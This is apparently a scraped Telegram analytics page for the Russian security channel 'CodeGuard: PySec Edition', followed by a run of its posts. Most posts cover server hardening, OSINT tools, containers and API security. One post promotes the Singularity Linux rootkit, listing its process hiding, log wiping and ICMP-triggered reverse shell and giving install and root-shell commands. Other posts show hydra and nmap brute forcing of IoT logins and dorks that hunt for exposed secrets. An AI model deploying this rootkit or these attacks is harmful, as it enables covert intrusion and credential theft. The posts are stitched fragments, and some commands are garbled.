CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Mostrar más📈 Análisis del canal de Telegram CodeGuard: PySec Edition
El canal CodeGuard: PySec Edition es un actor destacado. Actualmente la comunidad reúne a 14 088 suscriptores, ocupando la posición 8 765 en la categoría Tecnologías y Aplicaciones y el puesto 45 874 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 088 suscriptores.
Según los últimos datos del 27 septiembre, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 805, y en las últimas 24 horas de -8, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 9.78%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 5.55% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 378 visualizaciones. En el primer día suele acumular 782 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 7.
- Intereses temáticos: El contenido se centra en temas clave como codeguard, pysec, docker, grep, контейнер.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 28 septiembre, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
⭐️ Книга: «Взлом. Приемы, трюки и секреты хакеров. Версия 2.0» Год: 2022Если хочешь узнать реальные техники и секреты взлома, а также способы защиты — эта книга из лучших статей журнала «Хакер» для тебя. Практические кейсы на примерах инжекта шелл-кода, атак на Active Directory, обхода антивирусов и многое другое. 👨💻 Что внутри: - Инжект шелл-кода в KeePass и обход антивирусов - ShadowCoerce атака на Active Directory - Эксплуатация heap allocation и SOAP-сервера на Linux - Взлом протекторов Themida, Obsidium, .NET Reactor - Создание DDoS-утилит и трейнеров для игр - Тестирование протоколов OSPF, EIGRP и DTP - Детальный разбор уязвимости Log4Shell Книга для тех, кто хочет углубиться в практический взлом и безопасность. 💠 Бери книгу → [Archive] 😈 CodeGuard | Chat | #book #hacking #infosec #pentest
sudo apt update && sudo apt upgrade -y
sudo apt install unattended-upgrades -y
# Включение автообновлений (Debian / Ubuntu)
sudo dpkg-reconfigure --priority=low unattended-upgrades
Автоматические обновления позволяют быстро получать патчи безопасности без ручной работы.
➡️ Шаг 2. Создание отдельного администратора, отключение root SSH
# Создаём sudo-пользователя
sudo adduser adminuser
sudo usermod -aG sudo adminuser
# Отключаем вход по root в SSH
sudo sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
sudo systemctl reload sshd
Работа под обычным пользователем с sudo снижает риски полного взлома системы.
➡️ Шаг 3. Настройка firewall (ufw) — минимизация открытых портов
sudo apt install ufw -y
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow OpenSSH
sudo ufw allow http
sudo ufw allow https
# Пример для нестандартного порта
sudo ufw allow 8080/tcp
sudo ufw enable
sudo ufw status verbose
Закрывайте все ненужные порты и ограничивайте входящие подключения.
➡️ Шаг 4. Включение Fail2Ban — защита от брутфорса
sudo apt install fail2ban -y
sudo systemctl enable fail2ban
sudo systemctl start fail2ban
# Минимальный конфиг в /etc/fail2ban/jail.local
cat << EOF | sudo tee /etc/fail2ban/jail.local
[DEFAULT]
bantime = 86400
findtime = 600
maxretry = 5
[sshd]
enabled = true
EOF
sudo systemctl restart fail2ban
Fail2Ban автоматически блокирует IP после нескольких неудачных попыток входа по SSH.
➡️ Шаг 5. Настройка SELinux или AppArmor для контроля доступа приложений
- Включите SELinux:
sudo setenforce 1
- Проверяйте и настраивайте профили для сервисов
- AppArmor включён по умолчанию в Ubuntu, управляйте профилями с помощью aa-status и aa-enforce
📚 Рекомендуется:
- Регулярно аудитируйте открытые сервисы командой
sudo ss -tulnp
- Минимизируйте установленные пакеты:
dpkg --list
apt remove <unneeded-package>
📚 Источники: — Чеклист базовой безопасности — Безопасность сервера Linux — Базовая гигиена серверов LinuxСохраняй сервер под жестким контролем — сохраняй пост, инфа полезная) 😈 CodeGuard | Chat
🔥 ИИ для защиты: - Автоматический анализ поведения пользователей и систем для выявления аномалий - Интеллектуальные брандмауэры и системы обнаружения угроз, которые учатся на новом трафике - Обнаружение и блокировка фишинга, спама и вредоносных программ с помощью машинного обучения - Использование генеративного ИИ для распознавания и фильтрации сложных угроз - Автоматизация реагирования — от предложения сценариев до полного автопилотного ответа на атаки
🧨 ИИ в атаках: - Создание более сложных и адаптивных вредоносных программ и эксплойтов - Автоматический подбор и генерация уникальных вредоносных payload’ов - Влияние на социальную инженерию — генерация фишинговых писем и сообщений с высокой степенью достоверности - Использование ML-моделей для обхода антиспама и WAF - Сканирование и анализ уязвимостей в большом объёме данных за минимальное время🛠 Пример использования с AI для защиты:
# Запуск AI-модуля в системе мониторинга (пример условный)
ai-threat-detect --mode learn --input /var/log/syslog
# Выдаёт предупреждения при аномалиях
💡 Важно помнить, что ИИ помогает не заменить специалистов, а повысить их эффективность. Системы адаптируются, учатся и расширяют возможности, но человек остаётся в центре процесса принятия решений.
📚 Для подробного изучения: — https://pro32.com/ru/article/ii-i-kiberbezopasnost/ — https://ptsecurity.com/research/analytics/iskusstvennyi-intellekt-v-kiberzaschite/ — https://developers.sber.ru/help/gigachat-api/cybersecurity🚀 Искусственный интеллект — мощный союзник и новый фронт в кибербезопасности 😈 CodeGuard | Chat
Основные этапы работы с OSINT: ⚡️ 1. Пассивный сбор — изучаем доступные данные без взаимодействия с целью: - Поиск в соцсетях, на сайтах, форумах - Анализ общедоступных документов и метаданных - Использование архивов и кэша поисковиков ⚡️ 2. Активный сбор — аккуратное взаимодействие с целью, например, запросы DNS или открытые порты, чтобы не выдать себя ⚡️ 3. Анализ и фильтрация — систематизируем и отбрасываем лишнее, выделяем полезное🛠 Полезные инструменты:
# Поиск информации о IP и сети
shodan host <ip>
# Проверка и сбор данных с соцсетей
sherlock username
# Проверка активности домена и связей
whois example.com
dig example.com ANY
# Сбор поддоменов и расширенная разведка
subfinder -d example.com
# Анализ публичных документов и утечек
theHarvester -d example.com -b all
OSINT помогает понять, где и как атаковать, минимизируя лишние риски и усилия.
🤔 Разбор кейсов — на proglib.io и habr.com.
😈 CodeGuard | Chat# Сканируем сеть на устройства с открытым Telnet/SSH (быстрый поиск уязвимых IoT)
sudo nmap -p 22,23 --open --script ssh-brute,ftp-brute -iL targets.txt
# Поиск IoT в интернете через Shodan
shodan host <ip_устройства>
# Проверка открытых портов и сервисов на IoT устройстве
nmap -sV <ip_устройства>
# Мониторинг сетевого трафика для поиска подозрительных соединений
tcpdump -i eth0 port 23 or port 22
# Проверка слабых паролей через Hydra brute force (например, для Telnet)
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://<ip_устройства>
🔐 Советы по защите:
- Следите, чтобы на устройствах не было стандартных паролей и WPS отключён
- Настраивайте сегментацию сети — отделяйте IoT от ключевой инфраструктуры
- Обновляйте прошивки и следите за уязвимостями производителя
- Используйте IDS/IPS для обнаружения аномалий в трафике
- Внедряйте многофакторную аутентификацию, где возможно
📚 Подробнее в статьях: — Securitymedia.org — Codeby.netСвоевременные меры и регулярный мониторинг снижает риски IoT-инцидентов 😈 CodeGuard | Chat
🔥 Основные возможности: - Сокрытие процессов через фильтрацию на уровне syscall, скрывает процессы из /proc, ps, top и других системных команд - Скрытие файлов и директорий по заданным шаблонам (например, «singularity») - Скрытие сетевых портов, включая фильтрацию /proc/net/*, скрывает порт 8081 от ss, netstat, lsof - Эскалация привилегий с помощью сигнала kill -59 PID или переменной окружения MAGIC=mtz bash для получения root доступа - Скрытая обратная связь по ICMP-сигналу (magic ICMP packet) для запуска скрытого обратного шелла - Скрытие модуля ядра из списков, журналов ядра (dmesg), фильтрация логов для удаления следов - Блокировка механизмов трассировки и отладки системы, таких как debugfs, ftrace, BPF программы - Нормализация индикаторов taint ядра для устранения признаков загрузки несертифицированных модулей🛠 Установка:
cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
# Перед компиляцией измените IP в modules/icmp.c на IP атакующего
make
sudo insmod singularity.ko
sudo bash scripts/journal.sh
sudo bash scripts/x.sh
💡 Использование (примеры):
— Скрыть процесс с PID:
kill -59 <PID>
— Получить root shell:
MAGIC=mtz bash
— Скрыть открытый порт
Откройте порт 8081, он останется невидимым для системных инструментов
— Запуск обратного шелла через ICMP:
На атакующей машине запустите слушатель и выполните скрипт:
sudo python3 scripts/singularity_icmp_trigger.py <IP_цели>
📚 Источники: GitHub, Blog.kyntra.io
Singularity — это вызов для специалистов по цифровой криминалистике и безопасности, настоящий «финальный босс» Linux rootkit, который сложен для обнаружения и удаления
ставь реакцию, для тебя это легко — для меня мотивация 👍
😈 CodeGuard | Chatgoogler для работы с Google из командной строки:
sudo apt install googler
googler "site:example.com filetype:env password"
5. Собирайте результаты в файл и анализируйте их с помощью jq:
googler --json "inurl:wp-config.php" | jq '.[].link'
6. Для массовой проверки URL применяйте httpx
cat urls.txt | httpx -silent -status-code
🔗 Полезные ссылки: — Официальный сайт DorkGPT — Статья Google Dorking или используем Гугл на максимум — Ресурсы и базы Google DorksDorkGPT + Linux-инструменты — мощное сочетание для быстрого и точного OSINT и пентеста. 😈 CodeGuard | Chat
# Запуск контейнера с Ubuntu для тестов
docker run -it --rm ubuntu bash
# Просмотр активных контейнеров
docker ps
# Получение списка образов
docker images
# Остановка и удаление контейнера
docker stop ontainer_idid> && docker rm ontainerer_id>
📌 Виртуализация (KVM, VMware, VirtualBox) — полная изоляция с эмуляцией аппаратного обеспечения:
— Виртуальные машины запускают отдельную ОС, что даёт высокий уровень изоляции и контроль
— Подходит для сложных сценариев тестирования, где нужно менять ядро, конфигурацию оборудования или ОС
— Можно создавать снапшоты для отката после экспериментов
— Требует больше ресурсов и времени на настройку по сравнению с контейнерами
🛠 Пример создания ВМ с KVM:
# Создание виртуальной машины с помощью virt-install
virt-install --name testvm --memory 2048 --vcpus 2 --disk size=20 --cdrom /path/to/os.iso --network network=default
⚡️ Рекомендации по безопасности:
— Обновляйте хост и гостевые системы, чтобы не было уязвимостей
— Изолируйте сети виртуальных сред от основной инфраструктуры
— Используйте политики SELinux, AppArmor, seccomp для ограничения прав контейнеров
— Сканируйте образы контейнеров на уязвимости (например, с помощью Trivy)
📚 Подробнее: - https://7universum.com/ru/tech/archive/item/13725 - https://www.kaspersky.ru/blog/container-security/36087/ - https://habr.com/ru/companies/vk/articles/652149/😈 CodeGuard | Chat
🟫 Вывод: - Kali Linux — отличный выбор для быстрого начала и стабильной работы - BlackArch — подходит тем, кто хочет полный контроль, гибкость и свежие пакеты, готов инвестировать своё время в настройку системы🔗 Подробный обзор и сравнение 😈 CodeGuard | Chat
Навигация по уязвимостям ➡️ Уязвимости в решении Oracle E-Business Suite ➡️ Выполнение произвольного кода в Redis ➡️ Критическая уязвимость в движке Unity ➡️ Выполнение произвольных команд Figma MCP ➡️ Исправленные уязвимости в Microsoft ➡️ Чтение произвольных файлов в плагине WordPress📁 Можете глянуть 😈 CodeGuard | Chat
securitySchemes:
BearerAuth:
type: http
scheme: bearer
bearerFormat: JWT
🔐 Шаг 2. Шифрование
- Все соединения должны идти через HTTPS с TLS 1.2+
- На сервере храните чувствительные данные в зашифрованном виде (AES-256, bcrypt для паролей)
- Пример настройки TLS в Nginx:
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
⚡️ Шаг 3. Ограничение запросов и защита от DDoS
- Устанавливайте квоты на количество запросов (rate limiting)
- Используйте WAF с правилами для API
- Пример в Nginx с лимитом:
limit_req_zone $binary_remote_addr zone=api_limit:10m rate=5r/s;
server {
location /api/ {
limit_req zone=api_limit burst=10 nodelay;
}
}
🛠 Шаг 4. Валидация и санитизация входящих данных
- Проверяйте типы и значения параметров
- Используйте параметризованные запросы к БД для защиты от SQL-инъекций
- Санитизируйте и экранируйте вход для предотвращения XSS и других инъекций
📊 Шаг 5. Логирование и мониторинг
— Записывайте успешные и неудачные запросы
— Следите за подозрительными паттернами запросов и автоматическими атаками
— Есть смысл интегрировать с SIEM/EDR
🔎 Защищённый API — это основа надёжности, которая отсекает почти все классические угрозы.
😈 CodeGuard | Chat